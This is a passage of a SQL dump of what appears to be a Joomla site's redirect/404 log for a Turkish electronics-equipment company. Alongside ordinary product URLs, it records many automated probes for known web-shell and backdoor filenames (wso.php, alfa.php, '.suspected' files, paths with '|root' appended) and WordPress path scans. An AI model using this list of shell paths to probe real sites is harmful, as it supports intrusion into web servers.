00:00:00',301),(26884,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,mf_name',NULL,'','',568,0,'2021-03-20 08:53:32','0000-00-00 00:00:00',301),(26885,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',574,0,'2021-03-20 08:53:41','0000-00-00 00:00:00',301),(26886,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,ordering',NULL,'','',580,0,'2021-03-20 08:54:05','0000-00-00 00:00:00',301),(26887,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,product_name',NULL,'','',580,0,'2021-03-20 08:54:19','0000-00-00 00:00:00',301),(26888,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,product_sku',NULL,'','',601,0,'2021-03-20 08:54:46','0000-00-00 00:00:00',301),(26889,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/dirdesc',NULL,'','',600,0,'2021-03-20 08:55:03','0000-00-00 00:00:00',301),(26890,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',291,0,'2021-03-20 08:55:21','0000-00-00 00:00:00',301),(26891,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',292,0,'2021-03-20 08:55:30','0000-00-00 00:00:00',301),(26892,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/ly-8c-detail',NULL,'','',291,0,'2021-03-20 08:55:37','0000-00-00 00:00:00',301),(26893,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',305,0,'2021-03-20 08:55:50','0000-00-00 00:00:00',301),(26894,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±',NULL,'','',607,0,'2021-03-20 08:56:12','0000-00-00 00:00:00',301),(26895,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/am100-detail',NULL,'','',302,0,'2021-03-20 08:56:22','0000-00-00 00:00:00',301),(26896,'http://3s-technologies.com.tr/tr/ini.php',NULL,'http://3s-technologies.com.tr/ini.php','',261,0,'2021-03-20 08:56:23','0000-00-00 00:00:00',301),(26897,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/am100-detail/askquestion?tmpl=component',NULL,'','',304,0,'2021-03-20 08:56:34','0000-00-00 00:00:00',301),(26898,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',614,0,'2021-03-20 08:56:43','0000-00-00 00:00:00',301),(26899,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z',NULL,'','',578,0,'2021-03-20 08:56:51','0000-00-00 00:00:00',301),(26900,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',585,0,'2021-03-20 08:56:57','0000-00-00 00:00:00',301),(26901,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',596,0,'2021-03-20 08:57:05','0000-00-00 00:00:00',301),(26902,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,category_name/dirdesc',NULL,'','',562,0,'2021-03-20 08:57:48','0000-00-00 00:00:00',301),(26903,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,mf_name',NULL,'','',557,0,'2021-03-20 08:58:22','0000-00-00 00:00:00',301),(26904,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,mf_name/dirdesc',NULL,'','',553,0,'2021-03-20 08:58:32','0000-00-00 00:00:00',301),(26905,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,ordering',NULL,'','',568,0,'2021-03-20 08:59:02','0000-00-00 00:00:00',301),(26906,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,product_name',NULL,'','',560,0,'2021-03-20 08:59:20','0000-00-00 00:00:00',301),(26907,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,product_name/dirdesc',NULL,'','',563,0,'2021-03-20 08:59:28','0000-00-00 00:00:00',301),(26908,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,product_sku',NULL,'','',558,0,'2021-03-20 08:59:56','0000-00-00 00:00:00',301),(26909,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',279,0,'2021-03-20 09:01:07','0000-00-00 00:00:00',301),(26910,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',283,0,'2021-03-20 09:05:35','0000-00-00 00:00:00',301),(26911,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/ess-310-detail',NULL,'','',286,0,'2021-03-20 09:05:46','0000-00-00 00:00:00',301),(26912,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',293,0,'2021-03-20 09:05:54','0000-00-00 00:00:00',301),(26913,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeldri/ã§ubuk-lehim',NULL,'','',161,0,'2021-03-20 09:06:15','0000-00-00 00:00:00',301),(26914,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',563,0,'2021-03-20 09:06:25','0000-00-00 00:00:00',301),(26915,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,`p`.product_sku',NULL,'','',579,0,'2021-03-20 09:06:37','0000-00-00 00:00:00',301),(26916,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',570,0,'2021-03-20 09:06:48','0000-00-00 00:00:00',301),(26917,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name',NULL,'','',576,0,'2021-03-20 09:07:09','0000-00-00 00:00:00',301),(26918,'http://3s-technologies.com.tr/tr/wso.php.suspected',NULL,'http://3s-technologies.com.tr/wso.php.suspected','',3,0,'2021-03-20 09:30:52','0000-00-00 00:00:00',301),(26919,'http://3s-technologies.com.tr/tr/qw.php',NULL,'http://3s-technologies.com.tr/qw.php','',2,0,'2021-03-20 11:57:29','0000-00-00 00:00:00',301),(26920,'http://3s-technologies.com.tr/tr/test/simple.php5',NULL,'http://3s-technologies.com.tr/test/simple.php5','',1,0,'2021-03-20 14:36:33','0000-00-00 00:00:00',301),(26921,'http://3s-technologies.com.tr/tr/lsn_an.php|root',NULL,'http://3s-technologies.com.tr/lsn_an.php|root','',4,0,'2021-03-20 14:49:51','0000-00-00 00:00:00',301),(26922,'http://3s-technologies.com.tr/tr/skin/test.php',NULL,'http://3s-technologies.com.tr/skin/test.php','',4,0,'2021-03-20 15:01:25','0000-00-00 00:00:00',301),(26923,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme',NULL,'','',607,0,'2021-03-20 15:37:01','0000-00-00 00:00:00',301),(26924,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,`p`.product_sku',NULL,'','',593,0,'2021-03-20 15:37:47','0000-00-00 00:00:00',301),(26925,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,ordering',NULL,'','',582,0,'2021-03-20 15:38:41','0000-00-00 00:00:00',301),(26926,'http://3s-technologies.com.tr/tr/js/data.php',NULL,'http://3s-technologies.com.tr/js/data.php','',4,0,'2021-03-20 16:00:19','0000-00-00 00:00:00',301),(26927,'http://3s-technologies.com.tr/tr/js/info.php',NULL,'http://3s-technologies.com.tr/js/info.php','',1,0,'2021-03-20 17:15:04','0000-00-00 00:00:00',301),(26928,'http://3s-technologies.com.tr/tr/beence.php',NULL,'http://3s-technologies.com.tr/beence.php','',21,0,'2021-03-20 17:46:52','0000-00-00 00:00:00',301),(26929,'http://3s-technologies.com.tr/tr/cache/ganks.php.php',NULL,'http://3s-technologies.com.tr/cache/ganks.php.PhP','',2,0,'2021-03-20 18:20:05','0000-00-00 00:00:00',301),(26930,'http://3s-technologies.com.tr/tr/media/wp-xmlrpc.php',NULL,'http://3s-technologies.com.tr/media/wp-xmlrpc.php','',1,0,'2021-03-20 18:36:54','0000-00-00 00:00:00',301),(26931,'http://3s-technologies.com.tr/tr/mode.php',NULL,'http://3s-technologies.com.tr/mode.php','',26,0,'2021-03-20 19:10:47','0000-00-00 00:00:00',301),(26932,'http://3s-technologies.com.tr/tr/wp-form-ajax.php.suspected',NULL,'http://3s-technologies.com.tr/wp-form-ajax.php.suspected','',3,0,'2021-03-20 19:13:09','0000-00-00 00:00:00',301),(26933,'http://3s-technologies.com.tr/tr/wp-theme.php',NULL,'http://3s-technologies.com.tr/wp-theme.php','',28,0,'2021-03-20 19:27:35','0000-00-00 00:00:00',301),(26934,'http://3s-technologies.com.tr/tr/nsgin.com/blackhat.php',NULL,'http://3s-technologies.com.tr/nsgin.com/blackhat.php','',2,0,'2021-03-20 19:45:25','0000-00-00 00:00:00',301),(26935,'http://3s-technologies.com.tr/tr/media/mini.php',NULL,'http://3s-technologies.com.tr/media/mini.php','',1,0,'2021-03-20 20:04:55','0000-00-00 00:00:00',301),(26936,'http://3s-technologies.com.tr/tr/wp_fox.php.suspected',NULL,'http://3s-technologies.com.tr/wp_fox.php.suspected','',2,0,'2021-03-20 20:18:12','0000-00-00 00:00:00',301),(26937,'http://3s-technologies.com.tr/tr/cache/wp_asx.php',NULL,'http://3s-technologies.com.tr/cache/wp_asx.php','',1,0,'2021-03-20 20:56:00','0000-00-00 00:00:00',301),(26938,'http://3s-technologies.com.tr/tr/ngopo.php',NULL,'http://3s-technologies.com.tr/ngopo.php','',1,0,'2021-03-20 21:12:35','0000-00-00 00:00:00',301),(26939,'http://3s-technologies.com.tr/tr/media/404.php',NULL,'http://3s-technologies.com.tr/media/404.php','',1,0,'2021-03-20 21:29:17','0000-00-00 00:00:00',301),(26940,'https://3s-technologies.com.tr/tr/blog',NULL,'https://3s-technologies.com.tr/blog/','',21,0,'2021-03-20 21:47:16','0000-00-00 00:00:00',301),(26941,'https://3s-technologies.com.tr/tr/wp',NULL,'https://3s-technologies.com.tr/wp/','',22,0,'2021-03-20 21:47:17','0000-00-00 00:00:00',301),(26942,'https://3s-technologies.com.tr/tr/wordpress',NULL,'https://3s-technologies.com.tr/wordpress/','',22,0,'2021-03-20 21:47:17','0000-00-00 00:00:00',301),(26943,'https://3s-technologies.com.tr/tr/new',NULL,'https://3s-technologies.com.tr/new/','',22,0,'2021-03-20 21:47:18','0000-00-00 00:00:00',301),(26944,'https://3s-technologies.com.tr/tr/old',NULL,'https://3s-technologies.com.tr/old/','',22,0,'2021-03-20 21:47:18','0000-00-00 00:00:00',301),(26945,'https://3s-technologies.com.tr/tr/test',NULL,'https://3s-technologies.com.tr/test/','',22,0,'2021-03-20 21:47:19','0000-00-00 00:00:00',301),(26946,'https://3s-technologies.com.tr/tr/main',NULL,'https://3s-technologies.com.tr/main/','',27,0,'2021-03-20 21:47:20','0000-00-00 00:00:00',301),(26947,'https://3s-technologies.com.tr/tr/site',NULL,'https://3s-technologies.com.tr/site/','',21,0,'2021-03-20 21:47:20','0000-00-00 00:00:00',301),(26948,'https://3s-technologies.com.tr/tr/backup',NULL,'https://3s-technologies.com.tr/backup/','',22,0,'2021-03-20 21:47:21','0000-00-00 00:00:00',301),(26949,'https://3s-technologies.com.tr/tr/demo',NULL,'https://3s-technologies.com.tr/demo/','',21,0,'2021-03-20 21:47:22','0000-00-00 00:00:00',301),(26950,'https://3s-technologies.com.tr/tr/home',NULL,'https://3s-technologies.com.tr/home/','',23,0,'2021-03-20 21:47:23','0000-00-00 00:00:00',301),(26951,'https://3s-technologies.com.tr/tr/cms',NULL,'https://3s-technologies.com.tr/cms/','',21,0,'2021-03-20 21:47:24','0000-00-00 00:00:00',301),(26952,'https://3s-technologies.com.tr/tr/dev',NULL,'https://3s-technologies.com.tr/dev/','',21,0,'2021-03-20 21:47:24','0000-00-00 00:00:00',301),(26953,'https://3s-technologies.com.tr/tr/old-wp',NULL,'https://3s-technologies.com.tr/old-wp/','',21,0,'2021-03-20 21:47:25','0000-00-00 00:00:00',301),(26954,'https://3s-technologies.com.tr/tr/web',NULL,'https://3s-technologies.com.tr/web/','',21,0,'2021-03-20 21:47:25','0000-00-00 00:00:00',301),(26955,'https://3s-technologies.com.tr/tr/old-site',NULL,'https://3s-technologies.com.tr/old-site/','',21,0,'2021-03-20 21:47:26','0000-00-00 00:00:00',301),(26956,'https://3s-technologies.com.tr/tr/temp',NULL,'https://3s-technologies.com.tr/temp/','',21,0,'2021-03-20 21:47:27','0000-00-00 00:00:00',301),(26957,'https://3s-technologies.com.tr/tr/2018',NULL,'https://3s-technologies.com.tr/2018/','',21,0,'2021-03-20 21:47:27','0000-00-00 00:00:00',301),(26958,'https://3s-technologies.com.tr/tr/2019',NULL,'https://3s-technologies.com.tr/2019/','',21,0,'2021-03-20 21:47:28','0000-00-00 00:00:00',301),(26959,'https://3s-technologies.com.tr/tr/bk',NULL,'https://3s-technologies.com.tr/bk/','',22,0,'2021-03-20 21:47:29','0000-00-00 00:00:00',301),(26960,'https://3s-technologies.com.tr/tr/wp1',NULL,'https://3s-technologies.com.tr/wp1/','',21,0,'2021-03-20 21:47:29','0000-00-00 00:00:00',301),(26961,'https://3s-technologies.com.tr/tr/wp2',NULL,'https://3s-technologies.com.tr/wp2/','',21,0,'2021-03-20 21:47:30','0000-00-00 00:00:00',301),(26962,'https://3s-technologies.com.tr/tr/v1',NULL,'https://3s-technologies.com.tr/v1/','',21,0,'2021-03-20 21:47:31','0000-00-00 00:00:00',301),(26963,'https://3s-technologies.com.tr/tr/v2',NULL,'https://3s-technologies.com.tr/v2/','',21,0,'2021-03-20 21:47:31','0000-00-00 00:00:00',301),(26964,'https://3s-technologies.com.tr/tr/bak',NULL,'https://3s-technologies.com.tr/bak/','',21,0,'2021-03-20 21:47:32','0000-00-00 00:00:00',301),(26965,'https://3s-technologies.com.tr/tr/install',NULL,'https://3s-technologies.com.tr/install/','',21,0,'2021-03-20 21:47:32','0000-00-00 00:00:00',301),(26966,'https://3s-technologies.com.tr/tr/2020',NULL,'https://3s-technologies.com.tr/2020/','',21,0,'2021-03-20 21:47:33','0000-00-00 00:00:00',301),(26967,'https://3s-technologies.com.tr/tr/new-site',NULL,'https://3s-technologies.com.tr/new-site/','',21,0,'2021-03-20 21:47:34','0000-00-00 00:00:00',301),(26968,'http://3s-technologies.com.tr/tr/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-cron.php','',184,0,'2021-03-20 22:18:21','0000-00-00 00:00:00',301),(26969,'http://3s-technologies.com.tr/tr/errors/log.php',NULL,'http://3s-technologies.com.tr/errors/log.php','',1,0,'2021-03-20 22:53:30','0000-00-00 00:00:00',301),(26970,'http://3s-technologies.com.tr/tr/shoes.php',NULL,'http://3s-technologies.com.tr/shoes.php','',2,0,'2021-03-20 23:07:51','0000-00-00 00:00:00',301),(26971,'http://3s-technologies.com.tr/tr/media/ini.php',NULL,'http://3s-technologies.com.tr/media/ini.php','',2,0,'2021-03-20 23:11:08','0000-00-00 00:00:00',301),(26972,'http://3s-technologies.com.tr/tr/user.ini.php',NULL,'http://3s-technologies.com.tr/user.ini.php','',2,0,'2021-03-21 00:17:24','0000-00-00 00:00:00',301),(26973,'http://3s-technologies.com.tr/tr/media/sitemap.php',NULL,'http://3s-technologies.com.tr/media/sitemap.php','',1,0,'2021-03-21 00:18:03','0000-00-00 00:00:00',301),(26974,'http://3s-technologies.com.tr/tr/js/m.php',NULL,'http://3s-technologies.com.tr/js/m.php','',2,0,'2021-03-21 00:30:28','0000-00-00 00:00:00',301),(26975,'http://3s-technologies.com.tr/tr/media/test.php',NULL,'http://3s-technologies.com.tr/media/test.php','',2,0,'2021-03-21 00:51:14','0000-00-00 00:00:00',301),(26976,'http://3s-technologies.com.tr/tr/rxr__lrndqpbzfs.php',NULL,'http://3s-technologies.com.tr/RxR__lrndqpbzfs.php','',2,0,'2021-03-21 03:58:23','0000-00-00 00:00:00',301),(26977,'http://3s-technologies.com.tr/tr/media/a.php',NULL,'http://3s-technologies.com.tr/media/a.php','',1,0,'2021-03-21 04:31:20','0000-00-00 00:00:00',301),(26978,'http://3s-technologies.com.tr/tr/media/about.php',NULL,'http://3s-technologies.com.tr/media/about.php','',1,0,'2021-03-21 04:56:23','0000-00-00 00:00:00',301),(26979,'http://3s-technologies.com.tr/tr/media/css.php',NULL,'http://3s-technologies.com.tr/media/css.php','',2,0,'2021-03-21 05:03:16','0000-00-00 00:00:00',301),(26980,'http://3s-technologies.com.tr/tr/rxr__upxar.php',NULL,'http://3s-technologies.com.tr/RxR__upxar.php','',3,0,'2021-03-21 05:04:00','0000-00-00 00:00:00',301),(26981,'http://3s-technologies.com.tr/tr/cc.php',NULL,'http://3s-technologies.com.tr/cc.php','',162,0,'2021-03-21 05:49:21','0000-00-00 00:00:00',301),(26982,'http://3s-technologies.com.tr/tr/wp-logout.php.suspected',NULL,'http://3s-technologies.com.tr/wp-logout.php.suspected','',2,0,'2021-03-21 06:10:31','0000-00-00 00:00:00',301),(26983,'http://3s-technologies.com.tr/tr/hello.php.suspected',NULL,'http://3s-technologies.com.tr/hello.php.suspected','',4,0,'2021-03-21 07:07:02','0000-00-00 00:00:00',301),(26984,'http://3s-technologies.com.tr/tr/kuy.php',NULL,'http://3s-technologies.com.tr/kuy.php','',2,0,'2021-03-21 07:16:46','0000-00-00 00:00:00',301),(26985,'http://3s-technologies.com.tr/tr/aindex.php',NULL,'http://3s-technologies.com.tr/aindex.php','',3,0,'2021-03-21 08:33:22','0000-00-00 00:00:00',301),(26986,'http://3s-technologies.com.tr/tr/media/c.php',NULL,'http://3s-technologies.com.tr/media/c.php','',1,0,'2021-03-21 09:50:41','0000-00-00 00:00:00',301),(26987,'http://3s-technologies.com.tr/tr/content-post.php|root',NULL,'http://3s-technologies.com.tr/content-post.php|root','',2,0,'2021-03-21 10:07:48','0000-00-00 00:00:00',301),(26988,'http://3s-technologies.com.tr/tr/mhbgf.php',NULL,'http://3s-technologies.com.tr/Mhbgf.php','',4,0,'2021-03-21 10:25:21','0000-00-00 00:00:00',301),(26989,'http://3s-technologies.com.tr/tr/media/seter.php',NULL,'http://3s-technologies.com.tr/media/seter.php','',1,0,'2021-03-21 11:13:49','0000-00-00 00:00:00',301),(26990,'http://3s-technologies.com.tr/tr/media-admin.php/404.php',NULL,'http://3s-technologies.com.tr/media-admin.php/404.php','',2,0,'2021-03-21 11:14:17','0000-00-00 00:00:00',301),(26991,'http://3s-technologies.com.tr/tr/xm1rpe.php',NULL,'http://3s-technologies.com.tr/xm1rpe.php','',2,0,'2021-03-21 12:25:49','0000-00-00 00:00:00',301),(26992,'http://3s-technologies.com.tr/tr/js/index2.php',NULL,'http://3s-technologies.com.tr/js/index2.php','',1,0,'2021-03-21 12:55:37','0000-00-00 00:00:00',301),(26993,'http://3s-technologies.com.tr/tr/media/alfa.php',NULL,'http://3s-technologies.com.tr/media/alfa.php','',1,0,'2021-03-21 13:01:29','0000-00-00 00:00:00',301),(26994,'http://3s-technologies.com.tr/tr/media/m.php',NULL,'http://3s-technologies.com.tr/media/m.php','',1,0,'2021-03-21 13:33:46','0000-00-00 00:00:00',301),(26995,'https://mail.3s-technologies.com.tr/tr/owa',NULL,'','',4,0,'2021-03-21 13:38:23','0000-00-00 00:00:00',301),(26996,'http://3s-technologies.com.tr/tr/components/com_banners/helpers/theme.php',NULL,'http://3s-technologies.com.tr/components/com_banners/helpers/theme.php','',1,0,'2021-03-21 13:39:32','0000-00-00 00:00:00',301),(26997,'http://3s-technologies.com.tr/tr/media/readme.php',NULL,'http://3s-technologies.com.tr/media/readme.php','',1,0,'2021-03-21 13:47:46','0000-00-00 00:00:00',301),(26998,'http://3s-technologies.com.tr/tr/cgi-bin/cgi-bin1.php',NULL,'http://3s-technologies.com.tr/cgi-bin/cgi-bin1.php','',1,0,'2021-03-21 14:38:13','0000-00-00 00:00:00',301),(26999,'http://3s-technologies.com.tr/tr/media/index2.php',NULL,'http://3s-technologies.com.tr/media/index2.php','',1,0,'2021-03-21 15:13:59','0000-00-00 00:00:00',301),(27000,'http://3s-technologies.com.tr/tr/media/info.php',NULL,'http://3s-technologies.com.tr/media/info.php','',1,0,'2021-03-21 15:41:54','0000-00-00 00:00:00',301),(27001,'http://3s-technologies.com.tr/tr/css_.php',NULL,'http://3s-technologies.com.tr/css_.php','',1,0,'2021-03-21 16:23:05','0000-00-00 00:00:00',301),(27002,'http://3s-technologies.com.tr/tr/media/ups.php',NULL,'http://3s-technologies.com.tr/media/ups.php','',1,0,'2021-03-21 16:57:51','0000-00-00 00:00:00',301),(27003,'http://3s-technologies.com.tr/tr/media/log.php',NULL,'http://3s-technologies.com.tr/media/log.php','',1,0,'2021-03-21 16:59:35','0000-00-00 00:00:00',301),(27004,'http://3s-technologies.com.tr/tr/media/htaccess.php',NULL,'http://3s-technologies.com.tr/media/htaccess.php','',1,0,'2021-03-21 18:19:05','0000-00-00 00:00:00',301),(27005,'http://3s-technologies.com.tr/tr/skin/xml.php',NULL,'http://3s-technologies.com.tr/skin/xml.php','',1,0,'2021-03-21 18:27:18','0000-00-00 00:00:00',301),(27006,'http://3s-technologies.com.tr/tr/media/wso.php',NULL,'http://3s-technologies.com.tr/media/wso.php','',2,0,'2021-03-21 19:00:07','0000-00-00 00:00:00',301),(27007,'http://3s-technologies.com.tr/tr/wp-meta.php',NULL,'http://3s-technologies.com.tr/wp-meta.php','',2,0,'2021-03-21 19:01:59','0000-00-00 00:00:00',301),(27008,'http://3s-technologies.com.tr/tr/seomarket.php.suspected',NULL,'http://3s-technologies.com.tr/seomarket.php.suspected','',2,0,'2021-03-21 19:51:06','0000-00-00 00:00:00',301),(27009,'http://3s-technologies.com.tr/tr/templates/system/images/green.php',NULL,'http://3s-technologies.com.tr/templates/system/images/green.php','',1,0,'2021-03-21 20:18:04','0000-00-00 00:00:00',301),(27010,'http://3s-technologies.com.tr/tr/procate/popup-pomo.php',NULL,'http://3s-technologies.com.tr/procate/popup-pomo.php','',1,0,'2021-03-21 20:42:11','0000-00-00 00:00:00',301),(27011,'http://3s-technologies.com.tr/tr/layouts/joomla/system/mark.php.suspected',NULL,'http://3s-technologies.com.tr/layouts/joomla/system/mark.php.suspected','',1,0,'2021-03-22 02:59:35','0000-00-00 00:00:00',301),(27012,'http://3s-technologies.com.tr/tr/old/wp-page.php',NULL,'http://3s-technologies.com.tr/old/wp-page.php','',1,0,'2021-03-22 04:22:35','0000-00-00 00:00:00',301),(27013,'http://3s-technologies.com.tr/tr/store/log.php',NULL,'http://3s-technologies.com.tr/store//log.php','',1,0,'2021-03-22 06:49:48','0000-00-00 00:00:00',301),(27014,'http://3s-technologies.com.tr/tr/cache/list.php',NULL,'http://3s-technologies.com.tr/cache/list.php','',1,0,'2021-03-22 07:23:49','0000-00-00 00:00:00',301),(27015,'http://3s-technologies.com.tr/tr/media/post.php',NULL,'http://3s-technologies.com.tr/media/post.php','',1,0,'2021-03-22 09:42:17','0000-00-00 00:00:00',301),(27016,'http://3s-technologies.com.tr/en/ckfinder/ckfinder.html',NULL,'','',3,0,'2021-03-22 10:01:54','0000-00-00 00:00:00',301),(27017,'http://3s-technologies.com.tr/tr/media/home.php',NULL,'http://3s-technologies.com.tr/media/home.php','',1,0,'2021-03-22 10:18:20','0000-00-00 00:00:00',301),(27018,'http://3s-technologies.com.tr/tr/db-config.php',NULL,'http://3s-technologies.com.tr/db-config.php','',3,0,'2021-03-22 10:48:57','0000-00-00 00:00:00',301),(27019,'http://3s-technologies.com.tr/tr/libraries/legacy/log/jembut.php',NULL,'http://3s-technologies.com.tr/libraries/legacy/log/jembut.php','',1,0,'2021-03-22 11:11:02','0000-00-00 00:00:00',301),(27020,'http://3s-technologies.com.tr/tr/wp-blog-mail.php.suspected',NULL,'http://3s-technologies.com.tr/wp-blog-mail.php.suspected','',2,0,'2021-03-22 11:56:33','0000-00-00 00:00:00',301),(27021,'http://3s-technologies.com.tr/tr/lndex.php',NULL,'http://3s-technologies.com.tr/lndex.php','',2,0,'2021-03-22 12:17:50','0000-00-00 00:00:00',301),(27022,'http://3s-technologies.com.tr/tr/components/com_banners/metadata.php.suspected',NULL,'http://3s-technologies.com.tr/components/com_banners/metadata.php.suspected','',1,0,'2021-03-22 12:35:42','0000-00-00 00:00:00',301),(27023,'https://3s-technologies.com.tr/en//wp-includes/wlwmanifest.xml',NULL,'','',465,0,'2021-03-22 13:37:18','0000-00-00 00:00:00',301),(27024,'https://3s-technologies.com.tr/en//xmlrpc.php?rsd',NULL,'','',487,0,'2021-03-22 13:37:26','0000-00-00 00:00:00',301),(27025,'https://3s-technologies.com.tr/en//blog/wp-includes/wlwmanifest.xml',NULL,'','',486,0,'2021-03-22 13:37:28','0000-00-00 00:00:00',301),(27026,'https://3s-technologies.com.tr/en//web/wp-includes/wlwmanifest.xml',NULL,'','',483,0,'2021-03-22 13:37:29','0000-00-00 00:00:00',301),(27027,'https://3s-technologies.com.tr/en//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',486,0,'2021-03-22 13:37:29','0000-00-00 00:00:00',301),(27028,'https://3s-technologies.com.tr/en//website/wp-includes/wlwmanifest.xml',NULL,'','',470,0,'2021-03-22 13:37:30','0000-00-00 00:00:00',301),(27029,'https://3s-technologies.com.tr/en//wp/wp-includes/wlwmanifest.xml',NULL,'','',482,0,'2021-03-22 13:37:30','0000-00-00 00:00:00',301),(27030,'https://3s-technologies.com.tr/en//news/wp-includes/wlwmanifest.xml',NULL,'','',469,0,'2021-03-22 13:37:30','0000-00-00 00:00:00',301),(27031,'https://3s-technologies.com.tr/en//2020/wp-includes/wlwmanifest.xml',NULL,'','',219,0,'2021-03-22 13:37:31','0000-00-00 00:00:00',301),(27032,'https://3s-technologies.com.tr/en//2019/wp-includes/wlwmanifest.xml',NULL,'','',466,0,'2021-03-22 13:37:31','0000-00-00 00:00:00',301),(27033,'https://3s-technologies.com.tr/en//shop/wp-includes/wlwmanifest.xml',NULL,'','',472,0,'2021-03-22 13:37:32','0000-00-00 00:00:00',301),(27034,'https://3s-technologies.com.tr/en//wp1/wp-includes/wlwmanifest.xml',NULL,'','',482,0,'2021-03-22 13:37:32','0000-00-00 00:00:00',301),(27035,'https://3s-technologies.com.tr/en//test/wp-includes/wlwmanifest.xml',NULL,'','',482,0,'2021-03-22 13:37:33','0000-00-00 00:00:00',301),(27036,'https://3s-technologies.com.tr/en//wp2/wp-includes/wlwmanifest.xml',NULL,'','',466,0,'2021-03-22 13:37:33','0000-00-00 00:00:00',301),(27037,'https://3s-technologies.com.tr/en//site/wp-includes/wlwmanifest.xml',NULL,'','',483,0,'2021-03-22 13:37:34','0000-00-00 00:00:00',301),(27038,'https://3s-technologies.com.tr/en//cms/wp-includes/wlwmanifest.xml',NULL,'','',480,0,'2021-03-22 13:37:34','0000-00-00 00:00:00',301),(27039,'https://3s-technologies.com.tr/en//sito/wp-includes/wlwmanifest.xml',NULL,'','',466,0,'2021-03-22 13:37:35','0000-00-00 00:00:00',301),(27040,'http://3s-technologies.com.tr/tr/calculus/popup-pomo.php',NULL,'http://3s-technologies.com.tr/calculus/popup-pomo.php','',1,0,'2021-03-22 14:24:00','0000-00-00 00:00:00',301),(27041,'http://3s-technologies.com.tr/tr/dejanos-tu-cv/mailattach.php',NULL,'http://3s-technologies.com.tr/dejanos-tu-cv/mailattach.php','',1,0,'2021-03-22 15:47:11','0000-00-00 00:00:00',301),(27042,'http://3s-technologies.com.tr/tr/modules/mod_roknavmenu/themes/default/index.php',NULL,'http://3s-technologies.com.tr/modules/mod_roknavmenu/themes/default/index.php','',1,0,'2021-03-22 16:30:43','0000-00-00 00:00:00',301),(27043,'http://3s-technologies.com.tr/tr/shop/cron.php',NULL,'http://3s-technologies.com.tr/shop//cron.php','',3,0,'2021-03-22 16:48:12','0000-00-00 00:00:00',301),(27044,'http://3s-technologies.com.tr/tr/components/com_content/controllers/images.php',NULL,'http://3s-technologies.com.tr/components/com_content/controllers/images.php','',1,0,'2021-03-22 19:19:30','0000-00-00 00:00:00',301),(27045,'http://3s-technologies.com.tr/tr/media/sitemps.php',NULL,'http://3s-technologies.com.tr/media/sitemps.php','',1,0,'2021-03-22 19:20:20','0000-00-00 00:00:00',301),(27046,'http://3s-technologies.com.tr/tr/libraries/joomla/base/content-footer.php.suspected',NULL,'http://3s-technologies.com.tr/libraries/joomla/base/content-footer.php.suspected','',1,0,'2021-03-22 19:52:32','0000-00-00 00:00:00',301),(27047,'http://3s-technologies.com.tr/tr/ruf.php5.suspected',NULL,'http://3s-technologies.com.tr/ruf.php5.suspected','',2,0,'2021-03-22 19:53:17','0000-00-00 00:00:00',301),(27048,'http://3s-technologies.com.tr/tr/images/headers/theme.php',NULL,'http://3s-technologies.com.tr/images/headers/theme.php','',1,0,'2021-03-22 21:43:31','0000-00-00 00:00:00',301),(27049,'http://3s-technologies.com.tr/tr/plugins/system/banip.php',NULL,'http://3s-technologies.com.tr/plugins/system/banip.php','',1,0,'2021-03-23 00:31:11','0000-00-00 00:00:00',301),(27050,'http://3s-technologies.com.tr/tr/media/.fea20.php.suspected',NULL,'http://3s-technologies.com.tr/media/.fea20.php.suspected','',2,0,'2021-03-23 00:35:52','0000-00-00 